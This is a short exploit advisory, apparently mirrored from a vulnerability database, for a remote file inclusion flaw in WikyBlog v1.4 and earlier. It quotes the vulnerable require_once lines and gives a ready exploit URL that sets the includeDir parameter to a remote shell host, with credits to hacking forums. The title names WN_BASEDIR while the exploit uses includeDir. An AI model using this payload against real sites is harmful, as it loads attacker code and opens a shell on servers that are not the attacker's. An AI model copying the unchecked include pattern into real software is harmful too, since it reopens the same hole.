Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14546
HistoryOct 05, 2006 - 12:00 a.m.

WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

2006-10-0500:00:00
vulners.com
20

#==============================================================================================
#WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#Bug in :index.php

#Vlu Code :
#--------------------------------

require_once($includeDir.'/wiki2.php');

require_once($includeDir.'/wiki3.php');

#================================================================================================

#Exploit :
#--------------------------------

#htpp://sitename.com/[scerpitPath]/index.php?includeDir=http://SHELLURL.COM

#================================================================================================
#Discoverd By : MoHaNdKo

#Conatact : [email protected]
#or

wWw.xP10.CoM & wWw.TaRyaG.CoM

#Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA

and all member on xp10.com and tryag.com

==================================================================================================

vendor:
http://puzzle.dl.sourceforge.net/sourceforge/wikyblog/WikyBlog-1.2.3.zip